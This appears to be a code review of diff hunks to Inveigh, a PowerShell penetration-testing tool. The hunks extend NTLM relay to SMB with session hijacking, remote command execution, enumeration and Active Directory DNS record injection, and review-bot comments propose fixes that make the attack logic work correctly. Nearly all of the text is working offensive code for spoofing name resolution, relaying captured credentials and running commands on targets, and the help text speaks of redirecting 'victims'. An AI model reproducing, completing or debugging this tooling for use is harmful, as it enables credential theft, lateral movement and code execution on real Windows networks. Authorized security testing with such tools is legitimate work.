if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
{
- if($inveigh.relay_user_failed_list -notcontains "$HTTP_source_IP $HTTP_username_full $Target")
+ if($inveigh.relay_failed_auth_table.$HTTP_username_full.Count -le $FailedAuthLimit)
{
$inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Sending $NTLM_type response for $HTTP_username_full for relay to $Target") > $null
$SMB_relay_failed = SMBRelayResponse $SMB_client $HTTP_request_bytes $SMB_version $SMB_user_ID $session_ID $process_ID_bytes
if(!$SMB_relay_failed)
{
+ $inveigh.session_current = $inveigh.session_count
+ $inveigh.session_message_ID_table.Add($inveigh.session_count,3)
if($Attack -contains 'Session')
{
- $inveigh.session_socket_table[$inveigh.session_count] = $SMB_client
- $inveigh.session_table[$inveigh.session_count] = $session_ID
- $inveigh.session_message_ID_table[$inveigh.session_count] = 3
- $inveigh.session_lock_table[$inveigh.session_count] = 'open'
- $session_privilege = SMBRelayExecute $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes $true
- $session_object = New-Object PSObject
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_client.Client.RemoteEndpoint.Address.IPaddressToString
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Initiator $HTTP_source_IP
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $HTTP_username_full
-
- if($session_privilege)
- {
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "yes"
- }
- else
- {
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "no"
- }
if($SMB_client.Connected)
{
- $status = "connected"
- }
- else
- {
- $status = "disconnected"
+ $inveigh.session_socket_table[$inveigh.session_count] = $SMB_client
+ $inveigh.session_table[$inveigh.session_count] = $session_ID
+ $inveigh.session_lock_table[$inveigh.session_count] = 'open'
+ $session_privilege = SMBRelayExecute $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes $true
+ $session_object = New-Object PSObject
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $inveigh.session_count
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Target $SMB_client.Client.RemoteEndpoint.Address.IPaddressToString
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Initiator $HTTP_source_IP
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $HTTP_username_full
+
+ if($session_privilege)
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "yes"
+ }
+ else
+ {
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Privileged "no"
+ }
+
+ if($SMB_client.Connected)
+ {
+ $status = "connected"
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
+ $inveigh.session_list += $session_object
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Session $($inveigh.session_count) added to session list") > $null
+ }
+
}
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Established" $(Get-Date -format s)
- Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $(Get-Date -format s)
- $inveigh.session_list += $session_object
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Session $($inveigh.session_count) added to session list") > $null
- $inveigh.session_current = $inveigh.session_count
}
- if($attack -contains 'Enumerate')
+ if($Attack -contains 'Enumerate' -or $Attack -contains 'Execute')
{
- SMBRelayEnum $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $filter_date = Get-Date
}
- if($Attack -contains 'Execute')
+ if(($attack -contains 'Enumerate' -and $SMB_client.Connected) -and
+ (!$inveigh.enumeration_data[$target_index].Enumerate -or
+ (New-TimeSpan $inveigh.enumeration_data[$target_index].Enumerate $filter_date).Minutes -gt $RepeatEnumerate))
+ {
+ SMBRelayEnum $SMB_client $SMB_user_ID $session_ID $process_ID_bytes $Enumerate $EnumerateGroup
+ }
+
+ if((($session_privilege -and $Attack -contains 'Execute' -and $Attack -contains 'Session' -and $SMB_client.Connected) -or
+ ($Attack -contains 'Execute' -and $Attack -notcontains 'Session' -and $SMB_client.Connected)) -and
+ (!$inveigh.enumeration_data[$target_index].Execute -or (New-TimeSpan $inveigh.enumeration_data[$target_index].Execute $filter_date).Minutes -gt $RepeatExecute))
{
SMBRelayExecute $SMB_client $SMB_version $SMB_user_ID $session_ID $process_ID_bytes $false
+ $inveigh.enumeration_data[$target_index].Execute = $(Get-Date -format s)
+ }
+
+ if(!$SMB_client.Connected)
+ {
+ $inveigh.session_list[$inveigh.session_count] | Where-Object {$_.Status = "disconnected"}
}
$inveigh.session_count++
}
+ if($Attack -notcontains 'Session' -and !$SMB_relay_failed -and $RelayAutoDisable -eq 'Y')
+ {
+
+ if($Attack -contains 'Enumerate')
+ {
+
+ $targets_enumerate_complete = $inveigh.enumeration_data | Where-Object {$_.Enumerate} | Select-Object -expand IP
+
+ if($inveigh.target_list -and $targets_enumerated)
+ {
+ $targets_enumerate_remaining = Compare-Object -ReferenceObject $inveigh.target_list -DifferenceObject $targets_enumerate_complete -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+
+ }
+
+ if($Attack -contains 'Execute')
+ {
+
+ $targets_execute_complete = $inveigh.enumeration_data | Where-Object {$_.Execute} | Select-Object -expand IP
+
+ if($inveigh.target_list -and $targets_enumerated)
+ {
+ $targets_enumerate_remaining = Compare-Object -ReferenceObject $inveigh.target_list -DifferenceObject $targets_execute_complete -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+
+ }
+
+ if((!$targets_enumerate_remaining -and $Attack -contains 'Enumerate' -and $Attack -notcontains 'Execute') -or
+ (!$targets_execute_remaining -and $Attack -contains 'Execute' -and $Attack -notcontains 'Enumerate') -or
+ (!$targets_enumerate_remaining -and !$targets_execute_remaining -and $Attack -contains 'Enumerate' -and $Attack -contains 'Execute'))
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay auto disabled due to success") > $null
+ $inveigh.SMB_relay = $false
+ }
+
+ }
+
$relay_step = 0
}
else
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has already been tried on $Target") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay aborted since $HTTP_username_full has exceeded failed login limit") > $null
$SMB_client.Close()
$relay_step = 0
}
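Review bot: The auto-disable logic at L1447 and L1459 tests `$targets_enumerated`, which is never assigned anywhere in this hunk, so both Compare-Object calls are skipped, `$targets_enumerate_remaining` and `$targets_execute_remaining` stay empty, and the condition at L1466 disables the relay after the first success regardless of how many targets remain; L1461 additionally stores the Execute result in `$targets_enumerate_remaining`. The intended lines appear to be `if($inveigh.target_list -and $targets_enumerate_complete)`, `if($inveigh.target_list -and $targets_execute_complete)` and `$targets_execute_remaining = Compare-Object -ReferenceObject $inveigh.target_list -DifferenceObject $targets_execute_complete -PassThru | Where-Object {$_.SideIndicator -eq "<="}`. Separately, `(New-TimeSpan ...).Minutes` at L1420 and L1427 is the minutes component (0-59) of the span, not the elapsed time, so a target enumerated 61 minutes ago compares as 1 minute; `.TotalMinutes` is what the RepeatEnumerate/RepeatExecute comparison needs. The `| Where-Object {$_.Status = "disconnected"}` at L1435 (also L1702 and L1711) uses an assignment as a filter for its side effect; an explicit `if($inveigh.session_list[$inveigh.session_count]) { $inveigh.session_list[$inveigh.session_count].Status = "disconnected" }` says what it does.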
@@ -5408,7 +5895,7 @@ $HTTP_scriptblock =
}
$HTTP_client.Close()
- start-sleep -s 5
+ start-sleep -s 1
$HTTP_listener.Server.blocking = $false
Start-Sleep -s 1
$HTTP_listener.Server.Close()
@@ -5419,36 +5906,7 @@ $HTTP_scriptblock =
# Control Relay Loop ScriptBlock
$control_relay_scriptblock =
{
- param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime,$SigningCheck)
-
- function SigningCheck
- {
- $process_ID_bytes = Get-ProcessIDArray
- $target_list = $inveigh.target_list
-
- ForEach($target_entry in $target_list)
- {
- $SMB_client = New-Object System.Net.Sockets.TCPClient
- $SMB_client.Client.ReceiveTimeout = 5000
- $SMB_client.Connect($target_entry,"445")
-
- if(!$SMB_client.connected)
- {
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Relay target is not responding") > $null
- }
- else
- {
- SMBRelayChallenge $SMB_client $null '$SMB1' $process_ID_bytes $true > $null
- }
-
- }
-
- if(!$inveigh.target_list)
- {
- StopInveigh "empty target list"
- }
-
- }
+ param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime)
function OutputQueueLoop
{
@@ -5472,9 +5930,9 @@ $control_relay_scriptblock =
}
- function StopInveigh
+ function Stop-InveighRunspace
{
- param ([String]$exit_message)
+ param ([String]$Message)
if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
@@ -5499,24 +5957,24 @@ $control_relay_scriptblock =
}
- if($inveigh.DNS_list.Count -gt 0)
+ if($inveigh.DNS_table.Count -gt 0)
{
- foreach($DNS_host in $inveigh.DNS_list)
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
{
- if($DNS_host.StartsWith("1,"))
+ if($inveigh.DNS_table.$DNS_host -eq 1)
{
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+ $DNS_update = Invoke-DNSUpdateLite -DNSType A -DNSName $DNS_host
if($DNS_update -eq "[+] DNS update successful")
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) removed")
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $DNS_host removed")
}
else
{
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) remove failed")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $DNS_host remove failed")
}
}
@@ -5527,11 +5985,60 @@ $control_relay_scriptblock =
$inveigh.requested_host_list = New-Object System.Collections.ArrayList
$inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
}
+
+ if($inveigh.ADIDNS -eq 'Wildcard')
+ {
+
+ try
+ {
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node '*' -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ }
+
+ if($inveigh.ADIDNS -eq 'Combo' -and $inveigh.DNS_table.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
+ {
+
+ if($inveigh.DNS_table.$DNS_host -eq 1)
+ {
+
+ try
+ {
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node $DNS_host -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ $inveigh.DNS_table.$DNS_host = ""
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] ADIDNS host (A) record for $DNS_host remove failed") > $null
+ }
+
+ }
+
+ }
+
+ }
if($inveigh.relay_running)
{
Start-Sleep -S 1
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $exit_message") > $null
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $Message") > $null
+ }
+
OutputQueueLoop
Start-Sleep -S 1
$inveigh.relay_running = $false
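Review bot: The new Disable-ADIDNSNode calls at L1573 and L1595 reference `$ADIDNSCredential`, `$ADIDNSDomain`, `$ADIDNSDomainController`, `$ADIDNSPartition` and `$ADIDNSZone`, but this code runs inside `$control_relay_scriptblock`, whose parameter list at L1527 is only `$ConsoleQueueLimit,$RelayAutoExit,$RunTime`; unless these values are injected into the runspace some other way, they are null here and the record cleanup silently does nothing. The Combo loop at L1587 also writes `$inveigh.DNS_table.$DNS_host = ""` while enumerating `$inveigh.DNS_table.Keys`; if DNS_table is a hashtable, that modification invalidates the enumerator and the resulting exception is raised by the foreach itself, outside the try/catch. Iterating over a snapshot, `foreach($DNS_host in @($inveigh.DNS_table.Keys))`, avoids it. The enclosing Stop-InveighRunspace function starts outside this hunk.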
@@ -5540,7 +6047,12 @@ $control_relay_scriptblock =
if($inveigh.running)
{
Start-Sleep -S 1
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $exit_message") > $null
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $Message") > $null
+ }
+
OutputQueueLoop
Start-Sleep -S 1
$inveigh.running = $false
@@ -5549,12 +6061,6 @@ $control_relay_scriptblock =
$inveigh.HTTPS = $false
}
- if($SigningCheck -eq 'Y' -and $Target.Count -eq 1)
- {
- #SigningCheck
- $SigningCheck = 'N'
- }
-
if($RunTime)
{
$control_timeout = New-TimeSpan -Minutes $RunTime
@@ -5567,7 +6073,7 @@ $control_relay_scriptblock =
if($RelayAutoExit -eq 'Y' -and !$inveigh.SMB_relay)
{
Start-Sleep -S 5
- StopInveigh "disabled relay"
+ Stop-InveighRunspace "disabled relay"
}
if($RunTime)
@@ -5575,7 +6081,7 @@ $control_relay_scriptblock =
if($control_stopwatch.Elapsed -ge $control_timeout)
{
- StopInveigh "run time"
+ Stop-InveighRunspace "run time"
}
}
@@ -5627,6 +6133,13 @@ $control_relay_scriptblock =
OutputQueueLoop
Start-Sleep -m 5
+
+ if($inveigh.stop)
+ {
+ $inveigh.console_queue.Clear()
+ Stop-InveighRunspace
+ }
+
}
}
@@ -5648,7 +6161,7 @@ $session_refresh_scriptblock =
while($session -le $inveigh.session_socket_table.Count)
{
$session_timespan = New-TimeSpan $inveigh.session_list[$session]."Last Activity" $(Get-Date)
-
+
if($inveigh.session_socket_table[$session].Connected -and $inveigh.session_lock_table[$session] -eq 'open' -and $session_timespan.Minutes -ge $SessionRefresh)
{
$inveigh.session_lock_table[$session] = 'locked'
@@ -5662,9 +6175,7 @@ $session_refresh_scriptblock =
$SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
$message_ID++
$packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $false $message_ID $process_ID_bytes $tree_ID $session_ID
- #$packet_SMB2_header = New-PacketSMB2Header 0x0D,0x00 0x01,0x00 $message_ID $process_ID_bytes $tree_ID $session_ID
$packet_SMB2_data = New-PacketSMB2TreeConnectRequest $SMB_path_bytes
- #$packet_SMB2_data = New-PacketSMB2Echo # doesn't work for Win7
$SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
$SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
$packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
@@ -5679,7 +6190,8 @@ $session_refresh_scriptblock =
}
catch
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay session $session has closed") > $null
+ $inveigh.session_list[$session] | Where-Object {$_.Status = "disconnected"}
}
if($inveigh.session_socket_table[$session].Connected)
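Review bot: `$inveigh.session_list[$session] | Where-Object {$_.Status = "disconnected"}` in the new catch block uses an assignment inside a filter; it only works as a side effect (the scriptblock yields nothing, so Where-Object emits nothing) and reads like a typo for `-eq`. Set the property directly: `$inveigh.session_list[$session].Status = "disconnected"`. The same construct appears in the second catch block in the following hunk.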
@@ -5703,7 +6215,8 @@ $session_refresh_scriptblock =
}
catch
{
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay SMB session $session has closed") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Relay session $session has closed") > $null
+ $inveigh.session_list[$session] | Where-Object {$_.Status = "disconnected"}
}
}
@@ -5724,6 +6237,9 @@ $session_refresh_scriptblock =
}
+#endregion
+#region begin startup functions
+
# HTTP Listener Startup Function
function HTTPListener
{
@@ -5738,13 +6254,14 @@ function HTTPListener
$HTTP_powershell.AddScript($packet_functions_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
- $Command).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedAuthLimit).AddArgument(
+ $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
$Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
$SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
- $Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
- $WPADResponse) > $null
+ $Target).AddArgument($TargetMode).AddArgument($TargetRefresh).AddArgument($Username).AddArgument(
+ $WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
@@ -5762,9 +6279,10 @@ function HTTPSListener
$HTTPS_powershell.AddScript($packet_functions_scriptblock) > $null
$HTTPS_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
- $Command).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedAuthLimit).AddArgument(
+ $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
$Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
$SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
$Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
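Review bot: The HTTPS listener's argument chain still ends `$Target).AddArgument($Username).AddArgument($WPADAuth)...`, while the HTTPListener hunk above now inserts `$TargetMode` and `$TargetRefresh` between `$Target` and `$Username`. All three listeners invoke the same `$HTTP_scriptblock` and `AddArgument` binds positionally, so unless that scriptblock's param list differs per listener (its definition is outside this chunk) the HTTPS runspace would bind `$Username` into the TargetMode slot and shift every later argument by two. The ProxyListener hunk that follows has the same omission. Change the tail to `$Target).AddArgument($TargetMode).AddArgument($TargetRefresh).AddArgument($Username).AddArgument(` followed by `$WPADAuth).AddArgument($WPADAuthIgnore).AddArgument($WPADResponse) > $null`, matching HTTPListener.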
@@ -5786,9 +6304,10 @@ function ProxyListener
$proxy_powershell.AddScript($packet_functions_scriptblock) > $null
$proxy_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Attack).AddArgument($Challenge).AddArgument(
- $Command).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument(
- $HTTPResetDelayTimeout).AddArgument($HTTPS_listener).AddArgument($Proxy).AddArgument(
- $ProxyIgnore).AddArgument($proxy_listener).AddArgument($RelayAutoDisable).AddArgument(
+ $Command).AddArgument($Enumerate).AddArgument($EnumerateGroup).AddArgument($FailedAuthLimit).AddArgument(
+ $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument(
+ $HTTPS_listener).AddArgument($Proxy).AddArgument($ProxyIgnore).AddArgument($proxy_listener).AddArgument(
+ $RelayAutoDisable).AddArgument($RepeatEnumerate).AddArgument($RepeatExecute).AddArgument(
$Service).AddArgument($SMB_version).AddArgument($SessionLimitPriv).AddArgument(
$SessionLimitUnpriv).AddArgument($SessionLimitShare).AddArgument($SessionPriority).AddArgument(
$Target).AddArgument($Username).AddArgument($WPADAuth).AddArgument($WPADAuthIgnore).AddArgument(
@@ -5808,7 +6327,7 @@ function ControlRelayLoop
$control_relay_powershell.AddScript($packet_functions_scriptblock) > $null
$control_relay_powershell.AddScript($SMB_relay_functions_scriptblock) > $null
$control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($ConsoleQueueLimit).AddArgument(
- $RelayAutoExit).AddArgument($RunTime).AddArgument($SigningCheck) > $null
+ $RelayAutoExit).AddArgument($RunTime) > $null
$control_relay_powershell.BeginInvoke() > $null
}
@@ -5827,6 +6346,9 @@ function SessionRefreshLoop
$session_refresh_powershell.BeginInvoke() > $null
}
+#endregion
+#region begin startup enabled services
+
# HTTP Server Start
if($HTTP -eq 'Y')
{
@@ -6095,7 +6617,9 @@ finally
}
}
-#End Invoke-InveighRelay
+
+#endregion
+#region begin support functions
function Stop-Inveigh
{
@@ -6104,76 +6628,41 @@ function Stop-Inveigh
Stop-Inveigh will stop all running Inveigh functions.
#>
-if($inveigh)
-{
-
- if($inveigh.running -or $inveigh.relay_running)
+ if($inveigh)
{
+ $inveigh.stop = $true
- if($inveigh.DNS_list.Count -gt 0)
+ if($inveigh.running -or $inveigh.relay_running)
{
+ $inveigh.console_queue.Clear()
+ Watch-Inveigh -NoConsoleMessage
- foreach($DNS_host in $inveigh.DNS_list)
+ <#
+ if($inveigh.relay_running)
{
-
- if($DNS_host.StartsWith("1,"))
- {
-
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
-
- if($DNS_update -eq "[+] DNS update successful")
- {
- $output = "[+] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " removed"
- Write-Output $output
- }
- else
- {
- $output = "[-] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " remove failed"
- Write-Warning $output
- }
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
+ $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
}
- }
-
- $inveigh.DNS_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
- }
-
- if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
- {
-
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
+ if($inveigh.log_output)
{
- $certificate_store.Remove($certificate)
+ $inveigh.log.Add($output) > $null
}
- $certificate_store.Close()
- }
- catch
+ Write-Output $output
+ $inveigh.relay_running = $false
+ }
+
+ if($inveigh.running)
{
- $output = "[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]"
+ $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
if($inveigh.file_output)
{
- $output | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
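Review bot: The rewritten Stop-Inveigh keeps the old exit-message logic inside a `<# ... #>` block that runs from this hunk into the next; code superseded by the new `$inveigh.stop` flag should be deleted rather than left as dead text, or carry a one-line comment saying why it is retained. The removed code also deleted the Inveigh-issued HTTPS certificate from the `LocalMachine\My` store and reset the DNS record lists; ADIDNS record removal appears to have moved to the runspace stop path (see the top of this chunk), but certificate removal is not visible anywhere in this chunk — confirm it happens in `Stop-InveighRunspace`, otherwise a stop now leaves the generated certificate installed. `Watch-Inveigh -NoConsoleMessage` seems to be used here to block until the runspaces observe the flag; a comment stating that intent, e.g. `# block until the control runspace sees $inveigh.stop and exits`, would help the next reader.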
@@ -6181,56 +6670,20 @@ if($inveigh)
$inveigh.log.Add($output) > $null
}
- Write-Warning $output
+ Write-Output $output
+ $inveigh.running = $false
}
+ $inveigh.HTTPS = $false
+ #>
+ Start-Sleep -S 5
}
-
- if($inveigh.relay_running)
- {
- $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
-
- Write-Output $output
- $inveigh.relay_running = $false
- }
-
- if($inveigh.running)
+ else
{
- $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
-
- if($inveigh.file_output)
- {
- $output | Out-File $Inveigh.log_out_file -Append
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($output) > $null
- }
-
- Write-Output $output
- $inveigh.running = $false
+ Write-Output "[-] There are no running Inveigh functions"
}
- $inveigh.HTTPS = $false
- Start-Sleep -S 5
}
- else
- {
- Write-Output "[-] There are no running Inveigh functions"
- }
-
-}
}
@@ -6485,7 +6938,7 @@ Get relay session list.
if($Enumeration)
{
- Write-Output $inveigh.enumeration_list | Format-Table
+ Write-Output $inveigh.enumeration_data | Format-Table
}
}
@@ -6609,4 +7062,6 @@ if($inveigh)
}
+#endregion
+
} \ No newline at end of file
diff --git a/Inveigh.ps1 b/Inveigh.ps1
index f067d82..87f0a56 100644
--- a/Inveigh.ps1
+++ b/Inveigh.ps1
@@ -2,21 +2,43 @@ function Invoke-Inveigh
{
<#
.SYNOPSIS
-Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool with challenge/response
-capture over HTTP/HTTPS/Proxy/SMB.
+This function is a Windows PowerShell ADIDNS/LLMNR/NBNS/mDNS spoofer.
.DESCRIPTION
-Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool with the following features:
-
- IPv4 LLMNR/mDNS/NBNS spoofer with granular control
- AD DNS injection through secure dynamic updates
- NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/Proxy/SMB
- Basic auth cleartext credential capture over HTTP/HTTPS/Proxy
- WPAD server capable of hosting a basic or custom wpad.dat file
- HTTP/HTTPS/Proxy server capable of hosting limited content
- Granular control of console and file output
- Run time and run count control
- LLMNR/NBNS spoofer learning mode
+This function is a Windows PowerShell ADIDNS/LLMNR/NBNS/mDNS spoofer/man-in-the-middle tool with
+challenge/response capture over HTTP/HTTPS/Proxy/SMB.
+
+.PARAMETER ADIDNS
+Default = Disabled: (Combo/Wildcard) Enable an ADIDNS spoofing attack. Combo looks at LLMNR/NBNS requests and adds
+a record to DNS if the same request is received from multiple systems. Wildcard injects a wildcard record.
+
+.PARAMETER ADIDNSCredential
+PSCredential object that will be used with ADIDNS spoofing.
+
+.PARAMETER ADIDNSDomain
+The targeted domain in DNS format. This parameter is required when using an IP address in the
+ADIDNSDomainController parameter.
+
+.PARAMETER ADIDNSDomainController
+Domain controller to target. This parameter is mandatory on a non-domain attached system.
+
+.PARAMETER ADIDNSHostsIgnore
+Comma seperated list of hosts that will be ignored with ADIDNS spoofing.
+
+.PARAMETER ADIDNSIP
+IP address for ADIDNS spoofing. This parameter is only necessary when redirecting victims to a system other than
+the Inveigh host.
+
+.PARAMETER ADIPartition
+Default = DomainDNSZones: (DomainDNSZones/ForestDNSZone) The AD partition name where the zone is stored.
+
+.PARAMETER ADIDNSThreshold
+Default = 4: The threshold used to determine when ADIDNS records are injected for the combo attack. Inveigh will
+track identical LLMNR and NBNS requests received from multiple systems. DNS records will be injected once the
+system count for identical LLMNR and NBNS requests exceeds the threshold.
+
+.PARAMETER ADIDNSZone
+The ADIDNS zone.
.PARAMETER Challenge
Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
